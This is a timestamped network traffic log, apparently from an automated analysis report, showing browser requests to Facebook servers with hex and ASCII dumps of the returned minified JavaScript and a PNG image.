2023-05-15 17:27:03 UTC	3342	IN	Data Raw: 75 6c 6c 2c 74 72 61 6e 73 69 74 69 6f 6e 50 72 6f 67 72 65 73 73 3a 6e 75 6c 6c 2c 74 72 61 6e 73 69 74 69 6f 6e 43 6f 6d 70 6c 65 74 65 3a 6e 75 6c 6c 2c 6d 61 72 6b 65 72 50 72 6f 67 72 65 73 73 3a 6e 75 6c 6c 2c 6d 61 72 6b 65 72 49 6e 63 6f 6d 70 6c 65 74 65 3a 6e 75 6c 6c 2c 6d 61 72 6b 65 72 43 6f 6d 70 6c 65 74 65 3a 6e 65 77 20 4d 61 70 28 29 7d 29 2c 6e 75 6c 6c 3d 3d 3d 59 2e 6d 61 72 6b 65 72 43 6f 6d 70 6c 65 74 65 26 26 28 59 2e 6d 61 72 6b 65 72 43 6f 6d 70 6c 65 74 65 3d 6e 65 77 20 4d 61 70 28 29 29 2c 59 2e 6d 61 72 6b 65 72 43 6f 6d 70 6c 65 74 65 2e 73 65 74 28 63 2c 64 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 6a 28 63 2c 64 29 7b 76 26 26 28 6e 75 6c 6c 3d 3d 3d 59 26 26 28 59 3d 7b 74 72 61 6e 73 69 74 69 6f 6e 53 74 61 72 74 3a 6e 75 Data Ascii: ull,transitionProgress:null,transitionComplete:null,markerProgress:null,markerIncomplete:null,markerComplete:new Map()}),null===Y.markerComplete&&(Y.markerComplete=new Map()),Y.markerComplete.set(c,d))}function kj(c,d){v&&(null===Y&&(Y={transitionStart:nu
2023-05-15 17:27:03 UTC	3356	IN	Data Raw: 68 29 2c 49 67 28 66 2c 63 29 2c 63 2e 74 61 67 3d 31 2c 47 63 28 67 29 3f 28 66 3d 21 30 2c 4b 63 28 63 29 29 3a 66 3d 21 31 2c 59 67 28 63 2c 64 29 2c 59 66 28 63 2c 67 2c 68 29 2c 24 66 28 63 2c 67 2c 68 2c 64 29 2c 76 67 28 6e 75 6c 6c 2c 63 2c 67 2c 21 30 2c 66 2c 64 29 3b 63 61 73 65 20 31 39 3a 72 65 74 75 72 6e 20 48 67 28 66 2c 63 2c 64 29 3b 63 61 73 65 20 32 31 3a 72 65 74 75 72 6e 20 4d 28 66 2c 63 2c 63 2e 70 65 6e 64 69 6e 67 50 72 6f 70 73 2e 63 68 69 6c 64 72 65 6e 2c 64 29 2c 63 2e 63 68 69 6c 64 3b 63 61 73 65 20 32 32 3a 72 65 74 75 72 6e 20 70 67 28 66 2c 63 2c 64 29 3b 63 61 73 65 20 32 33 3a 72 65 74 75 72 6e 20 70 67 28 66 2c 63 2c 64 29 3b 63 61 73 65 20 32 34 3a 72 65 74 75 72 6e 20 59 67 28 63 2c 64 29 2c 67 3d 4e 28 4f 29 2c 6e Data Ascii: h),Ig(f,c),c.tag=1,Gc(g)?(f=!0,Kc(c)):f=!1,Yg(c,d),Yf(c,g,h),$f(c,g,h,d),vg(null,c,g,!0,f,d);case 19:return Hg(f,c,d);case 21:return M(f,c,c.pendingProps.children,d),c.child;case 22:return pg(f,c,d);case 23:return pg(f,c,d);case 24:return Yg(c,d),g=N(O),n
2023-05-15 17:27:03 UTC	3358	IN	Data Raw: 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 63 29 72 65 74 75 72 6e 20 69 6b 28 63 29 3f 31 3a 30 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 63 26 26 6e 75 6c 6c 21 3d 3d 63 29 7b 63 3d 63 2e 24 24 74 79 70 65 6f 66 3b 69 66 28 63 3d 3d 3d 6f 61 29 72 65 74 75 72 6e 20 31 31 3b 69 66 28 63 3d 3d 3d 72 61 29 72 65 74 75 72 6e 20 31 34 7d 72 65 74 75 72 6e 20 32 7d 66 75 6e 63 74 69 6f 6e 20 6b 6b 28 64 2c 65 29 7b 76 61 72 20 63 3d 64 2e 61 6c 74 65 72 6e 61 74 65 3b 6e 75 6c 6c 3d 3d 3d 63 3f 28 63 3d 68 6b 28 64 2e 74 61 67 2c 65 2c 64 2e 6b 65 79 2c 64 2e 6d 6f 64 65 29 2c 63 2e 65 6c 65 6d 65 6e 74 54 79 70 65 3d 64 2e 65 6c 65 6d 65 6e 74 54 79 70 65 2c 63 2e 74 79 70 65 3d 64 2e 74 79 70 65 2c 63 2e 73 74 61 74 65 4e 6f 64 65 3d 64 2e 73 74 61 74 65 4e 6f Data Ascii: ion"===typeof c)return ik(c)?1:0;if(void 0!==c&&null!==c){c=c.$$typeof;if(c===oa)return 11;if(c===ra)return 14}return 2}function kk(d,e){var c=d.alternate;null===c?(c=hk(d.tag,e,d.key,d.mode),c.elementType=d.elementType,c.type=d.type,c.stateNode=d.stateNo
2023-05-15 17:27:03 UTC	3372	IN	Data Raw: 65 6e 64 28 69 2e 6e 6f 64 65 2c 69 2e 6f 66 66 73 65 74 29 29 3a 28 64 2e 73 65 74 45 6e 64 28 69 2e 6e 6f 64 65 2c 69 2e 6f 66 66 73 65 74 29 2c 63 2e 61 64 64 52 61 6e 67 65 28 64 29 29 29 7d 64 3d 5b 5d 3b 66 6f 72 28 63 3d 65 3b 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 29 31 3d 3d 3d 63 2e 6e 6f 64 65 54 79 70 65 26 26 64 2e 70 75 73 68 28 7b 65 6c 65 6d 65 6e 74 3a 63 2c 6c 65 66 74 3a 63 2e 73 63 72 6f 6c 6c 4c 65 66 74 2c 74 6f 70 3a 63 2e 73 63 72 6f 6c 6c 54 6f 70 7d 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 66 6f 63 75 73 26 26 65 2e 66 6f 63 75 73 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 3d 64 5b 65 5d 2c 63 2e 65 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 63 Data Ascii: end(i.node,i.offset)):(d.setEnd(i.node,i.offset),c.addRange(d)))}d=[];for(c=e;c=c.parentNode;)1===c.nodeType&&d.push({element:c,left:c.scrollLeft,top:c.scrollTop});"function"===typeof e.focus&&e.focus();for(e=0;e<d.length;e++)c=d[e],c.element.scrollLeft=c
2023-05-15 17:27:03 UTC	3388	IN	Data Raw: 64 3f 67 63 28 63 2c 21 21 6e 2c 64 2c 21 31 29 3a 6e 75 6c 6c 21 3d 65 26 26 67 63 28 63 2c 21 21 6e 2c 65 2c 21 30 29 3b 72 65 74 75 72 6e 3b 63 61 73 65 22 74 65 78 74 61 72 65 61 22 3a 24 28 22 69 6e 76 61 6c 69 64 22 2c 63 29 3b 68 3d 66 3d 6e 3d 6e 75 6c 6c 3b 66 6f 72 28 67 20 69 6e 20 65 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 67 29 26 26 28 69 3d 65 5b 67 5d 2c 6e 75 6c 6c 21 3d 69 29 29 73 77 69 74 63 68 28 67 29 7b 63 61 73 65 22 76 61 6c 75 65 22 3a 6e 3d 69 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 65 66 61 75 6c 74 56 61 6c 75 65 22 3a 66 3d 69 3b 62 72 65 61 6b 3b 63 61 73 65 22 63 68 69 6c 64 72 65 6e 22 3a 68 3d 69 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 Data Ascii: d?gc(c,!!n,d,!1):null!=e&&gc(c,!!n,e,!0);return;case"textarea":$("invalid",c);h=f=n=null;for(g in e)if(Object.prototype.hasOwnProperty.call(e,g)&&(i=e[g],null!=i))switch(g){case"value":n=i;break;case"defaultValue":f=i;break;case"children":h=i;break;case"d
2023-05-15 17:27:03 UTC	3404	IN	Data Raw: 79 6c 65 73 68 65 65 74 22 3a 72 65 74 75 72 6e 20 63 3d 64 2e 64 69 73 61 62 6c 65 64 2c 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 64 2e 70 72 65 63 65 64 65 6e 63 65 26 26 6e 75 6c 6c 3d 3d 63 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 21 30 7d 63 61 73 65 22 73 63 72 69 70 74 22 3a 69 66 28 21 30 3d 3d 3d 64 2e 61 73 79 6e 63 26 26 21 64 2e 6f 6e 4c 6f 61 64 26 26 21 64 2e 6f 6e 45 72 72 6f 72 26 26 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 64 2e 73 72 63 26 26 64 2e 73 72 63 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 76 61 72 20 7a 6e 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 41 6e 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 42 6e 28 63 2c 65 2c 66 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 7a 6e 29 74 68 72 6f 77 20 45 Data Ascii: ylesheet":return c=d.disabled,"string"===typeof d.precedence&&null==c;default:return!0}case"script":if(!0===d.async&&!d.onLoad&&!d.onError&&"string"===typeof d.src&&d.src)return!0}return!1}var zn=null;function An(){}function Bn(c,e,f){if(null===zn)throw E

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3169	OUT	GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" Origin: https://www.facebook.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://www.facebook.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3172	IN	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT Content-MD5: cxEZEvS096W1UB3HTVACWw== Expires: Wed, 08 May 2024 06:01:36 GMT Cache-Control: public,max-age=31536000,immutable timing-allow-origin: * document-policy: force-load-at-top permissions-policy: accelerometer=() cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff x-fb-rlafr: 0 X-FB-Debug: uGbIhKSW6t8e0hP0BeIEpXMfup9Ry+K7wa6rGireOVbZuIFF2s9oECrovt5knmpop8pR+A57EncmkwIy9Cy0Ww== X-FB-TRIP-ID: 1679558926 Date: Mon, 15 May 2023 17:27:03 GMT Access-Control-Allow-Origin: https://www.facebook.com Vary: Origin Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 18154
2023-05-15 17:27:03 UTC	3173	IN	Data Raw: 3b Data Ascii: ;
2023-05-15 17:27:03 UTC	3175	IN	Data Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 74 33 68 4f 4c 73 38 77 6c 58 79 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 6a 61 76 61 73 63 72 69 70 74 2d 62 6c 6f 77 66 69 73 68 2d 31 2e 30 2e 35 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 6b 65 79 3d 62 2c 28 63 3d 3d 3d 22 65 63 62 22 7c 7c 63 3d 3d 3d 22 63 62 63 22 29 26 26 28 74 68 Data Ascii: /FB_PKG_DELIM//** * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ */__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"\|\|c==="cbc")&&(th
2023-05-15 17:27:03 UTC	3207	IN	Data Raw: 31 34 36 32 32 34 36 2c 33 30 31 33 32 33 32 31 33 38 2c 31 36 38 32 32 39 32 39 35 37 2c 31 34 38 33 35 32 39 39 33 35 2c 34 37 31 39 31 30 35 37 34 2c 31 35 33 39 32 34 31 39 34 39 2c 34 35 38 37 38 38 31 36 30 2c 33 34 33 36 33 31 35 30 30 37 2c 31 38 30 37 30 31 36 38 39 31 2c 33 37 31 38 34 30 38 38 33 30 2c 39 37 38 39 37 36 35 38 31 2c 31 30 34 33 36 36 33 34 32 38 2c 33 31 36 35 39 36 35 37 38 31 2c 31 39 32 37 39 39 30 39 35 32 2c 34 32 30 30 38 39 31 35 37 39 2c 32 33 37 32 32 37 36 39 31 30 2c 33 32 30 38 34 30 38 39 30 33 2c 33 35 33 33 34 33 31 39 30 37 2c 31 34 31 32 33 39 30 33 30 32 2c 32 39 33 31 39 38 30 30 35 39 2c 34 31 33 32 33 33 32 34 30 30 2c 31 39 34 37 30 37 38 30 32 39 2c 33 38 38 31 35 30 35 36 32 33 2c 34 31 36 38 32 32 36 34 Data Ascii: 1462246,3013232138,1682292957,1483529935,471910574,1539241949,458788160,3436315007,1807016891,3718408830,978976581,1043663428,3165965781,1927990952,4200891579,2372276910,3208408903,3533431907,1412390302,2931980059,4132332400,1947078029,3881505623,41682264

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3172	OUT	GET /images/cookies/cookie_info_popup_image_4.png HTTP/1.1 Host: www.facebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3174	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-MD5: Ae8VnBRpCv1xxClCp11bLQ== Edge-Control: cache-maxage=86400s Expires: Mon, 15 May 2023 23:05:08 GMT Cache-Control: public,max-age=86400 report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]} x-fb-rlafr: 0 document-policy: force-load-at-top permissions-policy: accelerometer=(), gyroscope=(), screen-wake-lock=() cross-origin-resource-policy: cross-origin cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report" cross-origin-opener-policy: same-origin-allow-popups X-Content-Type-Options: nosniff timing-allow-origin: * Strict-Transport-Security: max-age=15552000; preload X-FB-Debug: CCBYtdHu2wo1vguE9GokW5PNNHcFH6cjEv7chTH1ToXKHkHtnBYcD0RQRArku3ot2rbyyhbIYKe7JptR/ssfZA== Date: Sun, 14 May 2023 23:05:08 GMT Connection: close Content-Length: 38147
2023-05-15 17:27:03 UTC	3175	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 24 00 00 00 f0 08 02 00 00 00 bf a1 e8 37 00 00 94 ca 49 44 41 54 78 5e ec d5 31 0d 00 00 08 03 30 fc 8b dd 2c a0 82 8b 26 f5 d0 69 73 0a 00 1e 64 03 80 6c 00 90 0d 00 c8 06 00 d9 00 80 6c 00 90 0d 00 b2 01 00 d9 00 20 1b 00 64 03 00 b2 01 40 36 00 20 1b 00 64 03 80 6c 00 40 36 00 c8 06 00 d9 00 80 6c 58 76 cc 65 47 6d 20 88 a2 f9 ff ff 98 d9 0d b6 61 b2 19 84 bb db a6 8d 1f 08 44 94 64 90 82 b1 81 f1 f3 01 62 e6 07 72 db 3d 8a 22 b1 c8 2e c2 52 95 8e 4b b7 aa ab 7b 51 9b 2b b9 eb 5a 4d 55 95 45 91 e7 79 56 96 c5 e9 74 3c 1e 0f 20 cb 4e 7f f4 e1 90 a2 d0 5a 37 93 24 49 d3 14 3a 49 f6 fb 7d 8c 0f 33 00 1a ec 76 bf 92 24 8e e3 9d 2e 31 83 0e 4a 08 64 68 d0 f7 63 dd d7 25 04 be bf e7 d3 14 af 20 94 46 Data Ascii: PNGIHDR$7IDATx^10,&isdll d@6 dl@6lXveGm aDdbr=".RK{Q+ZMUEyVt< NZ7$I:I}3v$.1Jdhc% F
2023-05-15 17:27:03 UTC	3209	IN	Data Raw: f5 58 7e 68 2c f9 ae 84 ce f7 cd e3 68 20 66 43 10 04 99 0d b1 08 d7 23 96 df 18 c0 15 7e 73 ff 66 23 e6 cb 61 ec 99 20 08 32 1b fa 8d 66 d8 27 fd 63 6a 0c e4 60 78 78 62 dc 59 0c 60 c9 04 41 90 d9 10 d1 ea a7 1b a5 2f e1 45 ac 9a af 5e f3 12 80 da 72 1b cb e9 b3 28 90 4d a7 36 9d c6 14 b5 21 4a e4 9e d2 e0 0a cb a9 90 4d 51 a1 a3 06 78 81 ac 35 9a 28 0d 1c 69 c1 33 83 e7 c6 a7 ce 4d 4c 2a 9d e9 d3 cf 79 96 23 03 0c 8c d8 9b c1 70 a5 84 ee ef 16 4a a3 a9 44 61 c9 eb c3 93 cd dd 60 00 4b 26 08 82 cc 86 f8 cd ce 99 35 b5 71 6c 01 38 bf 39 06 c7 2c 36 bc 24 55 5e 0a 97 2f 5e b0 b1 fd 60 aa e2 f2 f5 c5 8e 6c 64 10 02 0b 21 79 f6 4d d2 88 d1 ec 5a 66 24 84 a4 d9 fd 7e 8f 10 45 04 38 09 37 37 55 8e e2 73 ea 2b 55 f7 39 3d ad c7 af ba 7b a6 65 59 d6 75 bd de 3a Data Ascii: X~h,h fC#~sf#a 2f'cj`xxbY`A/E^r(M6!JMQx5(i3ML*y#pJDa`K&5ql89,6$U^/^`ld!yMZf$~E877Us+U9={eYu:
2023-05-15 17:27:03 UTC	3241	IN	Data Raw: 5d 56 0c ef e0 44 d1 bd 1c b7 9b c9 ae d7 1e 41 e7 b4 c3 75 51 60 fc ff 0d 26 90 aa 59 7c a9 ed 46 aa a2 dd 88 44 c0 88 1e 17 fd f3 0e 0f 45 db c1 bd 27 a3 03 1e bc 5a 12 20 50 02 b9 a1 64 1a 36 2a 34 2d f0 6c 24 c2 46 55 f3 98 d4 ba 93 40 94 f2 4e 40 08 90 80 af a6 41 68 11 4b 80 43 4c 50 3f 0f 33 40 17 d4 e7 93 a0 19 d9 20 4e 10 9f 75 e2 8b df c1 22 7c 14 24 21 87 80 1f 42 96 80 a0 83 7c 17 81 3f 84 24 20 07 d8 10 58 42 b7 02 84 74 80 90 1b 24 62 cf 83 19 0f 42 7c c6 74 b1 00 2a d0 81 41 82 2b 20 fe bb 3d c8 fb 81 96 00 0c 72 8c 06 78 5e 0e 6b 02 1f 99 42 e5 27 26 e7 90 5b 83 e1 7c ad a4 aa a9 c6 41 f2 d0 67 e5 3b 5f 07 36 94 28 51 9e 8d 9f 30 1a 6d 93 69 dd b1 00 b6 e8 3e cd 21 c7 a4 2d 67 ba b6 58 b6 6b bb 35 9f ba 52 bb cf e8 41 d8 f3 7c 51 78 bc 6f Data Ascii: ]VDAuQ`&Y\|FDE'Z Pd64-l$FU@N@AhKCLP?3@ Nu"\|$!B\|?$ XBt$bB\|tA+ =rx^kB'&[\|Ag;_6(Q0mi>!-gXk5RA\|Qxo
2023-05-15 17:27:03 UTC	3273	IN	Data Raw: 95 be 4e ed 64 31 6c 58 4c 9a 86 82 a3 cd 59 c9 a6 92 a6 34 7e c7 cd 37 de f8 ea e2 15 9e 30 06 a7 64 96 56 71 ea d5 d6 e1 6a 62 06 69 8d 8c 1e f8 a1 bf c5 a5 ae 1b 3d 42 1b f4 72 74 63 98 44 c8 b9 9c 76 8a 24 88 6a d8 68 2f b1 9e 43 87 69 3e 6f 0b 0d d8 cc 24 9f 8d 0f 95 7f b8 b5 c9 57 9d cb 59 0c 1b 16 0b 65 3e 0a 33 ea d3 0f 98 4a 1a 5b ce a1 39 0f 4d 1d 3e 62 cc a1 63 b6 5e 61 83 4f b3 a5 c5 e5 2f 11 b0 71 2a 25 cb c8 64 d1 03 86 16 0d 70 e2 06 42 94 fb a9 d2 82 ec 15 9a 6b 6f b5 40 d2 59 4e 34 d1 5e 78 36 bb dc 7b d8 dc 67 0c 9b 19 d3 ef ff 83 29 7f 6b 45 19 be e8 12 cd 62 d8 b0 58 28 03 55 94 0d d2 00 06 a6 c2 66 fb a7 1f fb fb 07 2c 5f bd d9 f3 a8 30 78 6b e0 ed b0 b8 ba 0c 5c 50 cb 2d 3b 14 e9 6c 1d 92 96 22 4e 03 14 d1 ad 10 21 44 3e 22 23 39 a8 Data Ascii: Nd1lXLY4~70dVqjbi=BrtcDv$jh/Ci>o$WYe>3J[9M>bc^aO/q*%dpBko@YN4^x6{g)kEbX(Uf,_0xk\P-;l"N!D>"#9

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3418	OUT	GET /rsrc.php/v3/yI/r/Ib90vcVxYzI.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" Origin: https://www.facebook.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://www.facebook.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3420	IN	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT Content-MD5: yPX69CiwY3xWsbNax/G9ew== Expires: Sun, 12 May 2024 15:34:58 GMT Cache-Control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top permissions-policy: accelerometer=(), midi=() cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff timing-allow-origin: * origin-agent-cluster: ?0 X-FB-Debug: KH0rzpTGdAKpAk4AvRpmhBAxu2XqJ3X7oVGh2nBdxij1i2UEJs0uWbypA6MgP6qdmUF0tnpgIIKb1c7KQRLCOA== X-FB-TRIP-ID: 1679558926 Date: Mon, 15 May 2023 17:27:03 GMT Access-Control-Allow-Origin: https://www.facebook.com Vary: Origin Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 50835
2023-05-15 17:27:03 UTC	3421	IN	Data Raw: 3b Data Ascii: ;
2023-05-15 17:27:03 UTC	3421	IN	Data Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 64 50 64 63 53 69 67 6e 61 6c 73 46 61 6c 63 6f 45 76 65 6e 74 22 2c 5b 22 46 61 6c 63 6f 4c 6f 67 67 65 72 49 6e 74 65 72 6e 61 6c 22 2c 22 67 65 74 46 61 6c 63 6f 4c 6f 67 50 6f 6c 69 63 79 5f 44 4f 5f 4e 4f 54 5f 55 53 45 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 63 28 22 67 65 74 46 61 6c 63 6f 4c 6f 67 50 6f 6c 69 63 79 5f 44 4f 5f 4e 4f 54 5f 55 53 45 22 29 28 22 31 37 34 33 30 39 35 22 29 3b 62 3d 64 28 22 46 61 6c 63 6f 4c 6f 67 67 65 72 49 6e 74 65 72 6e 61 6c 22 29 2e 63 72 65 61 74 65 28 22 62 64 5f 70 64 63 5f 73 69 67 6e 61 6c 73 22 2c 61 29 3b 65 3d 62 3b 67 5b 22 64 65 66 61 75 6c 74 Data Ascii: /FB_PKG_DELIM/__d("BdPdcSignalsFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1743095");b=d("FalcoLoggerInternal").create("bd_pdc_signals",a);e=b;g["default
2023-05-15 17:27:03 UTC	3431	IN	Data Raw: 70 6f 6e 65 6e 74 3d 61 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 73 65 74 44 75 72 61 74 69 6f 6e 55 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 31 2e 64 75 72 61 74 69 6f 6e 5f 75 73 3d 61 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 73 65 74 45 78 63 65 70 74 69 6f 6e 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 31 2e 65 78 63 65 70 74 69 6f 6e 5f 6d 65 73 73 61 67 65 3d 61 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 73 65 74 45 78 63 65 70 74 69 6f 6e 53 74 61 63 6b 54 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 31 2e 65 78 63 65 70 74 69 6f 6e 5f 73 74 61 63 6b 5f 74 72 61 63 65 3d 61 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 73 65 74 45 78 63 65 70 74 69 6f Data Ascii: ponent=a;return this};c.setDurationUs=function(a){this.$1.duration_us=a;return this};c.setExceptionMessage=function(a){this.$1.exception_message=a;return this};c.setExceptionStackTrace=function(a){this.$1.exception_stack_trace=a;return this};c.setExceptio
2023-05-15 17:27:03 UTC	3462	IN	Data Raw: 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 44 4d 6f 75 73 65 50 72 65 73 65 6e 63 65 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 6f 72 22 2c 5b 22 42 44 54 6f 75 63 68 4f 72 4d 6f 75 73 65 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 6f 72 42 61 73 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 36 30 2a 36 30 2a 31 65 33 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 61 2c 62 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 74 68 69 73 2c 6b 2e 73 69 67 6e 61 6c 54 79 70 65 2c 5b 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 22 6d 6f 75 Data Ascii: efault"]=a}),98);__d("BDMousePresenceSignalCollector",["BDTouchOrMouseSignalCollectorBase"],(function(a,b,c,d,e,f,g){"use strict";var h=60601e3,i=function(b){babelHelpers.inheritsLoose(a,b);function a(){return b.call(this,k.signalType,["mousedown","mou
2023-05-15 17:27:03 UTC	3478	IN	Data Raw: 72 6e 20 74 68 69 73 7d 3b 62 2e 73 65 74 48 65 61 72 74 62 65 61 74 56 65 72 73 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 68 62 56 65 72 73 69 6f 6e 3d 61 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 67 65 74 48 65 61 72 74 62 65 61 74 56 65 72 73 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 62 56 65 72 73 69 6f 6e 7d 3b 62 2e 67 65 74 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 62 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 7d 3b 62 2e 73 65 74 43 6f 6e 66 69 67 47 65 6e 65 72 61 74 69 6f 6e 54 69 6d 65 53 74 61 6d 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 Data Ascii: rn this};b.setHeartbeatVersion=function(a){this.hbVersion=a;return this};b.getHeartbeatVersion=function(){return this.hbVersion};b.getBiometricSignalBufferSize=function(){return this.biometricSignalBufferSize};b.setConfigGenerationTimeStamp=function(a){th
